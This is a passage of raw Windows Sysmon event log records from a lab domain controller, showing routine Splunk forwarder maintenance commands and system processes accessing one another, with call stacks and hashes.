check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{733EE690-3E0E-5F80-5B00-000000007F01}3808C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000002096Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0E-5F80-5B00-000000007F01}3808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002095Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002094Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002093Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002092Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002091Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002090Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002089Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002088Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002087Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002086Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E0E-5F80-5B00-000000007F01}3808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002085Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3E09-5F80-3400-000000007F01}20323896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E0E-5F80-5B00-000000007F01}3808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002084Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.129{733EE690-3E0E-5F80-5B00-000000007F01}3808C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002083Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.088{733EE690-3E0D-5F80-5A00-000000007F01}39643976C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002240Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.354{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0F-5F80-6600-000000007F01}3796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002239Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002238Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002237Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002236Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002235Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002234Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002233Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002232Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002231Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002230Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.354{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E0F-5F80-6600-000000007F01}3796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002229Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.354{733EE690-3E09-5F80-3400-000000007F01}20323896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E0F-5F80-6600-000000007F01}3796C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002228Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.356{733EE690-3E0F-5F80-6600-000000007F01}3796C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® 